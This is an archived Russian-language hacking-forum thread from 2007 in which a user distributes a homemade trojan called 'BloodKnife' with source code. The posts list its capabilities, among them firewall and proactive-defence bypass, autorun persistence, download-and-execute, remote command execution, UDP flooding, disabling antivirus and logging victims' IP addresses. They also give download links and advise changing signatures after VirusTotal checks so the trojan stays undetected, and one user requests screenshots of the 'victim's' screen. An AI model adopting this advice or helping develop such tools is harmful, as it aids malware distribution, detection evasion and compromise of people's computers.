ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.06.2007, 20:11
|
|
Познающий
Регистрация: 26.12.2006
Сообщений: 31
Провел на форуме:
95909
Репутация:
10
|
|
Ky3bMu4, спалился DrWeb - DLOADER.Trojan ((
|
|
|
21.06.2007, 20:36
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Сообщение от vii
Исправляй!
Вы меньше проверьте на VIRUSTOTAL_е, и все будет ништьяк !!!!
блин, ЗАПОНМИТЕ - когда вы что-то проверите, там проверяется роботом, а потом если что-то не то, или какой то антивир косяк показал, то тот сигнатура уже опубликуется и все антивирусы обнавляются (через ихний лабораториях).
и по этому через день или два - даже самый конченный антивирус будет палить !
Просто если проверяйте - потом обязательно меняйте сигнатуру и все.
|
|
|
|
22.06.2007, 07:15
|
|
Новичок
Регистрация: 19.06.2007
Сообщений: 22
Провел на форуме:
34487
Репутация:
4
|
|
Ky3bMu4 блин у меня похоже непошел твой трой!(версия 1.2 была!)
Хотел на себе испытать и бац комп перезагрузился!
У меня win xp sp2!
|
|
|
|
22.06.2007, 08:56
|
|
Banned
Регистрация: 22.03.2007
Сообщений: 19
Провел на форуме:
81244
Репутация:
2
|
|
может кто нить обьяснит как он работает ?
|
|
|
|
22.06.2007, 09:25
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Сообщение от Ky3bMu4
Вот, наконец то появилось время дописать. Итак, описание:
1)Есть какой-никакой обход фаеров(переписаный _dkcs_ddos_bot`овский).
2)SDT restore(обход проактивок).
3)Копируется в системную диру, пишется в автозагрузку.
Функции:
1)Отправка месаги юзеру.
2)просмотр содержимого файла.
3)Download && Execute.
4)Открыть\закрыть cd-rom.
5)Разные игры с панелькой винды, нажатие кнопки пуск.
6)Выполнение команд в cmd.
7)UDP Flood(!).
8)Выключение виря.
Еще вопросы есть? А КАК именно он работает, смотри в исходниках.
__________________
...
|
|
|
|
22.06.2007, 21:03
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
Версия 1.4
+Добавлен отстук по стату. IP заражённых компов пишется в лог.
http://lordofring.tushino.com/BloodKnife.v.1.4.rar - c исходниками
Последний раз редактировалось Ky3bMu4; 22.06.2007 в 23:43..
|
|
|
|
22.06.2007, 21:24
|
|
Новичок
Регистрация: 27.03.2007
Сообщений: 26
Провел на форуме:
446935
Репутация:
23
|
|
Сообщение от Ky3bMu4
Версия 1.4
+Добавлен отстук по стату. IP заражённых компов пишется в лог.
http://lordofring.tushino.com/public_html/BloodKnife.v.1.4.rar - c исходниками
Not Found
The requested URL /public_html/BloodKnife.v.1.4.rar was not found on this server.
Apache/1.3.31 Server at lordofring.tushino.com Port 80
|
|
|
|
22.06.2007, 21:54
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме:
1536533
Репутация:
370
|
|
public_html/ в адресе убери иполучишь что ишешь.
|
|
|
|
07.07.2007, 13:54
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
+Добавлен конфигуратор.
http://rapidshare.com/files/41581223/configur_bloodrnife.rar.html - исходники конфигуратора там же.
Последний раз редактировалось Ky3bMu4; 07.07.2007 в 21:48..
|
|
|
|
08.07.2007, 20:10
|
|
Познающий
Регистрация: 05.03.2007
Сообщений: 99
Провел на форуме:
744734
Репутация:
44
|
|
Сделай пожалуйста чтобы можно было делать скрины экрана жертвы.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
